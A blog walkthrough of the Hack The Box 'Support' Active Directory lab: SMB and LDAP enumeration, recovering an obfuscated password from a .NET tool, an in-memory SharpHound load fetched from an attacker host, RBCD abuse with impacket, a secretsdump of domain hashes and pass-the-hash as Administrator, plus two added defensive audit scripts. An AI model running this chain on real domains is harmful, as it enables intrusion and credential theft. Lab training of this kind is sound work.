Host discovery
export ip=10.129.230.181
Port scan
nmap --min-rate 10000 -p- -Pn $ip
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49678/tcp open  unknown
49683/tcp open  unknown
49706/tcp open  unknown
49744/tcp open  unknown
The full set of domain services exposed (DNS, Kerberos, LDAP, Global Catalog, kpasswd, ADWS) shows that this host is an Active Directory domain controller (DC).
Service scan
nmap -sT -sV -sC -O -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49678,49683,49706,49744 $ip
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-06 05:57:42Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49683/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
49744/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (87%)
OS CPE: cpe:/o:microsoft:windows_server_2022
Aggressive OS guesses: Microsoft Windows Server 2022 (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-04-06T05:58:58
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: 1s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.05 seconds
Service exploitation
(1) SMB 445 enumeration
crackmapexec smb 10.129.230.181 -u '' -p '' --shares
┌──(root㉿kali)-[/home/kali/bc/windows/support]
└─# crackmapexec smb 10.129.230.181 -u '' -p '' --shares
SMB         10.129.230.181  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB         10.129.230.181  445    DC               [+] support.htb\:
SMB         10.129.230.181  445    DC               [-] Error enumerating shares: STATUS_ACCESS_DENIED
smbclient -L //10.129.230.181/ -N
- -N (No Pass): attempt a null session; if the server allows anonymous access to the share, its contents can be listed without any username or password
┌──(root㉿kali)-[/home/kali/bc/windows/support]
└─# smbclient -L //10.129.230.181/ -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	support-tools   Disk      support staff tools
	SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.230.181 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
A non-default share named support-tools is listed; try to access it
smbclient //10.129.230.181/support-tools -N
The connection succeeds and the prompt appears:
smb: >
Run ls to list the directory

A custom tool is found:
UserInfo.exe.zip
Download it
get UserInfo.exe.zip
Or fetch it directly with one command
smbmap -u guest -H 10.129.230.181 -r support-tools -A UserInfo.exe.zip -download
Unzip it
unzip UserInfo.exe.zip
Identify the file type
file UserInfo.exe
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
The binary is a .NET assembly,
so it can be decompiled back to readable C#,
using dnSpy
using System;
using System.Text;

namespace UserInfo.Services
{
	// Token: 0x02000006 RID: 6
	internal class Protected
	{
		// Token: 0x0600000F RID: 15 RVA: 0x00002118 File Offset: 0x00000318
		public static string getPassword()
		{
			// Base64-decode the stored blob, then XOR each byte with the
			// repeating key and the constant 223 (0xDF)
			byte[] array = Convert.FromBase64String(Protected.enc_password);
			byte[] array2 = array;
			for (int i = 0; i < array.Length; i++)
			{
				array2[i] = (byte)(array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
			}
			return Encoding.Default.GetString(array2);
		}

		// Token: 0x04000005 RID: 5
		private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

		// Token: 0x04000006 RID: 6
		private static byte[] key = Encoding.ASCII.GetBytes("armando");
	}
}
This exposes both the encoded password and the obfuscation routine (Base64 plus a repeating-key XOR with a fixed constant), so it can be reversed
Decrypt it with Python
import base64

# Values copied from the decompiled Protected class
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"

array = base64.b64decode(enc_password)
# Reverse getPassword(): XOR is its own inverse, so apply the same key byte and 223 again
array2 = bytes(array[i] ^ key[i % len(key)] ^ 223 for i in range(len(array)))
print(array2.decode())
Recovered password
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
(2) LDAP 389
First map the hostnames in /etc/hosts
echo "10.129.230.181 support.htb dc.support.htb" | sudo tee -a /etc/hosts
Then try an anonymous bind
ldapsearch -x -H ldap://support.htb -s base namingContexts
┌──(root㉿kali)-[/home/kali/bc/windows/support]
└─# ldapsearch -x -H ldap://support.htb -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts
#

#
dn:
namingContexts: DC=support,DC=htb
namingContexts: CN=Configuration,DC=support,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=support,DC=htb
namingContexts: DC=DomainDnsZones,DC=support,DC=htb
namingContexts: DC=ForestDnsZones,DC=support,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
Anonymous bind is allowed for the rootDSE, and the domain naming context is DC=support,DC=htb
Query the domain tree
ldapsearch -x -H ldap://support.htb -b "DC=support,DC=htb"
┌──(root㉿kali)-[/home/kali/bc/windows/support]
└─# ldapsearch -x -H ldap://support.htb -b "DC=support,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=support,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5A, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c

# numResponses: 1
Authentication is required for anything beyond the rootDSE
We can test which account the password recovered above belongs to
crackmapexec smb 10.129.230.181 -u 'ldap' 'support' 'armando' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

Username: ldap
Password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
Trying this credential against WinRM failed
Use the credential for authenticated domain enumeration instead
ldapsearch -x -H ldap://support.htb -D "ldap@support.htb" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" > ldap.txt
Then mine the results
Check the description fields
grep -i "description" ldap.txt
Look for other service accounts
grep "sAMAccountName" ldap.txt
Check the info fields
grep -i "info" ldap.txt
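The grep commands above work, but they also match every line that merely contains the word "info". The following script is an added example, not part of the original write-up: it parses an ldapsearch LDIF dump properly (base64 values, wrapped continuation lines, record separators) and flags note-style attributes whose value looks like a stored password. The same scan is what a defender should run against their own domain, because description and info are readable by every authenticated user. The LDIF text is a constructed sample shaped like the write-up's ldap.txt; the heuristic regexes are my own choices.

```python
"""Scan an LDIF dump for user attributes that look like they hold credentials."""
import base64
import re

# Free-text attributes that admins commonly (mis)use for notes.
NOTE_ATTRIBUTES = ("description", "info", "comment")

# Heuristic: no whitespace, at least 8 characters, mixes letters and digits.
PASSWORD_LIKE = re.compile(r"^(?=.*[A-Za-z])(?=.*\d)\S{8,}$")
# Also flag prose that talks about credentials at all.
KEYWORDS = re.compile(r"(pass|pwd|cred|login)", re.IGNORECASE)


def parse_ldif(text):
    """Parse LDIF into a list of {attribute: [values]} dicts.

    Handles '::' base64 values, continuation lines (leading space),
    '#' comment lines and blank-line record separators.
    """
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:   # continuation of the previous line
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:                # trailing "" flushes the last record
        if line == "":
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        colon = line.find(":")
        if colon == -1:
            continue
        key = line[:colon].strip()
        if line[colon:colon + 2] == "::":    # base64-encoded value
            val = base64.b64decode(line[colon + 2:].strip()).decode("utf-8", "replace")
        else:
            val = line[colon + 1:].strip()
        current.setdefault(key, []).append(val)
    return entries


def find_credential_leaks(entries):
    """Return (account, attribute, value) for every suspicious note attribute."""
    findings = []
    for entry in entries:
        name = entry.get("sAMAccountName", entry.get("dn", ["?"]))[0]
        for attr in NOTE_ATTRIBUTES:
            for val in entry.get(attr, []):
                if PASSWORD_LIKE.match(val) or KEYWORDS.search(val):
                    findings.append((name, attr, val))
    return findings


# Constructed sample LDIF; only the support entry mirrors the write-up's finding.
SAMPLE_LDIF = """\
# extended LDIF
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: user
sAMAccountName: support
description: Support staff account
info: Ironside47pleasure40Watchful

dn: CN=ldap,CN=Users,DC=support,DC=htb
objectClass: user
sAMAccountName: ldap
description:: TERBUCBsb29rdXAgYWNjb3VudA==

dn: CN=Guest,CN=Users,DC=support,DC=htb
sAMAccountName: Guest
description: Built-in account for guest access to the computer/domain
 (wrapped continuation line)
"""

if __name__ == "__main__":
    for account, attr, value in find_credential_leaks(parse_ldif(SAMPLE_LDIF)):
        print("%s: %s = %s" % (account, attr, value))
```

Run it against a real dump with `parse_ldif(open("ldap.txt").read())`. The base64 branch matters in practice: ldapsearch emits any value with leading spaces or non-ASCII as `attr:: <base64>`, which a plain grep for the cleartext never sees.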
A support account exists; it deserves close attention, since it shares its name with the box
Collect the support account's attributes
ldapsearch -x -H ldap://support.htb -D "ldap@support.htb" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" "(sAMAccountName=support)" > ldap_support.txt

The info field is populated
info: Ironside47pleasure40Watchful
This looks like a password
Try logging in with it
Initial foothold
ldapsearch -x -H ldap://support.htb -D "support@support.htb" -w 'Ironside47pleasure40Watchful' -b "DC=support,DC=htb" -s base

evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i support.htb

Login succeeds
Get the user flag

Lateral movement to the DC
We use BloodHound
- Locate SharpHound.ps1 on Kali
cp /usr/share/metasploit-framework/data/post/powershell/SharpHound.ps1 ./
- Load it in memory on the target
IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.16.253:8081/SharpHound.ps1')
Then check that it loaded
*Evil-WinRM* PS C:\Users\support\AppData\Local\Temp> Get-Command Invoke-BloodHound

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Function        Invoke-BloodHound
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\support\AppData\Local\Temp
- Download the results (since the session is over Evil-WinRM, use its built-in download command rather than a PowerShell cmdlet)
download 20260406002644_BloodHound.zip /home/kali/bc/windows/support/support_bloodhound.zip

- Start the BloodHound GUI
Start the Neo4j database
sudo neo4j console
Log in at the default address http://localhost:7474 with the default credentials neo4j/neo4j
You are forced to change the password on first login
Then write the new password into BloodHound's configuration file at /etc/bhapi/bhapi.json
Then run
bloodhound
Log in with the default admin/admin
After uploading the collected files, the domain can be analyzed

What permissions does the BloodHound data show the support user has over the DC.SUPPORT.HTB object?
Pathfinding query: start node SUPPORT.HTB, end node DC.SUPPORT.HTB
This shows the relationship between the current user and the DC

A common attack with generic all on a computer object is to add a fake computer to the domain. What attribute on the domain sets how many computer accounts a user is allowed to create in the domain?
Key attribute: ms-DS-MachineAccountQuota
*Evil-WinRM* PS C:\Users\support\Documents> ([adsi]"LDAP://DC=support,DC=htb")."ms-DS-MachineAccountQuota"
10
This means an ordinary domain user may create up to 10 new machine accounts, and we also hold GenericAll over the DC computer object
So resource-based constrained delegation (RBCD) can be used to reach the DC
- Create a new machine account from Kali
impacket-addcomputer 'support.htb/support:Ironside47pleasure40Watchful' -dc-ip 10.129.230.181 -computer-name 'EVIL-PC$' -computer-pass 'Password123'

- Configure the RBCD delegation
impacket-rbcd -delegate-from 'EVIL-PC$' -delegate-to 'DC$' -action 'write' -dc-ip 10.129.230.181 'support.htb/support:Ironside47pleasure40Watchful'
This tells the DC: "DC trusts EVIL-PC$ and lets it access DC on behalf of anyone in the domain (including Administrator)"
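Both preconditions of this step are auditable attributes, and the RBCD write itself leaves a durable artifact on the DC$ object. The script below is an added example, not part of the original write-up or of impacket: it decodes the msDS-AllowedToActOnBehalfOfOtherIdentity value (a standard Windows self-relative security descriptor) and lists the SIDs its DACL trusts, then reports that together with a non-zero ms-DS-MachineAccountQuota. The descriptor builder exists only to construct test input offline; every SID, RID and account name in the sample is a placeholder, not a support.htb value, and the ACE access mask 0x000F01FF is a constructed full-access value.

```python
"""Audit helper: decode RBCD descriptors and flag a permissive machine-account quota."""
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000


def build_sid(sid_str):
    """Encode 'S-1-5-21-...' into binary SID form (revision, count, authority, subauthorities)."""
    parts = sid_str.split("-")
    assert parts[0] == "S" and parts[1] == "1"
    subs = [int(p) for p in parts[3:]]
    out = bytes([1, len(subs)]) + int(parts[2]).to_bytes(6, "big")
    return out + b"".join(struct.pack("<I", s) for s in subs)


def parse_sid(buf, off):
    """Decode a binary SID at buf[off:], returning (sid_string, byte_length)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count


def build_rbcd_descriptor(trustee_sids, owner_sid="S-1-5-32-544"):
    """Build a self-relative security descriptor granting the trustees access
    (constructed test input shaped like the attribute RBCD tooling writes)."""
    aces = b""
    for sid in trustee_sids:
        sid_bin = build_sid(sid)
        # ACE header: type, flags, size, access mask; then the trustee SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_bin), 0x000F01FF) + sid_bin
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(trustee_sids), 0) + aces
    owner = build_sid(owner_sid)          # BUILTIN\Administrators as owner and group
    off_owner = 20                        # descriptor header is 20 bytes
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         off_owner, off_group, 0, off_dacl)
    return header + owner + owner + dacl


def rbcd_trustees(descriptor):
    """Return the SIDs granted access by the descriptor's DACL (empty if no DACL)."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", descriptor, 0)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", descriptor, off_dacl)
    trustees, pos = [], off_dacl + 8
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", descriptor, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            trustees.append(parse_sid(descriptor, pos + 8)[0])
        pos += ace_size                   # skip by size so unknown ACE types are tolerated
    return trustees


def audit_rbcd(computers, machine_account_quota):
    """Report a non-zero quota and every computer object with RBCD configured."""
    findings = []
    if machine_account_quota > 0:
        findings.append("ms-DS-MachineAccountQuota=%d: unprivileged users can join machine accounts"
                        % machine_account_quota)
    for comp in computers:
        sd = comp.get("msDS-AllowedToActOnBehalfOfOtherIdentity")
        if sd:
            findings.append("%s allows delegation from %s"
                            % (comp["sAMAccountName"], ", ".join(rbcd_trustees(sd))))
    return findings


# Constructed sample: a DC object after an RBCD write, and a clean workstation.
ROGUE_MACHINE_SID = "S-1-5-21-1111-2222-3333-1105"   # placeholder, stands in for EVIL-PC$
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "DC$",
     "msDS-AllowedToActOnBehalfOfOtherIdentity": build_rbcd_descriptor([ROGUE_MACHINE_SID])},
    {"sAMAccountName": "WS01$"},
]

if __name__ == "__main__":
    for finding in audit_rbcd(SAMPLE_COMPUTERS, 10):
        print(finding)
```

In a real audit the descriptor bytes come straight from LDAP (the attribute is returned as a binary value), and the quota from the domain object as shown above. Any computer whose attribute names a SID that is not a known, intended front-end service is a finding; setting ms-DS-MachineAccountQuota to 0 removes the first precondition this chain relies on.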

- Obtain a service ticket as Administrator
impacket-getST -dc-ip 10.129.230.181 -spn 'cifs/dc.support.htb' -impersonate 'Administrator' 'support.htb/EVIL-PC$:Password123'

- Dump the DC hashes
First set the environment variable, because the next tool reads the ticket cache from it
export KRB5CCNAME=Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
Then run the script
impacket-secretsdump -k -no-pass -dc-ip 10.129.230.181 'dc.support.htb'

- Log in
evil-winrm -i 10.129.230.181 -u Administrator -H bb06cbc02b39abeddd1335bc30b19e26
Then simply
cd C:\Users\Administrator\Desktop
and read root.txt
Unless stated otherwise, all articles on this blog are the author's original work.
If you repost, please credit the source: https://www.oneblanks.xyz/htb-support/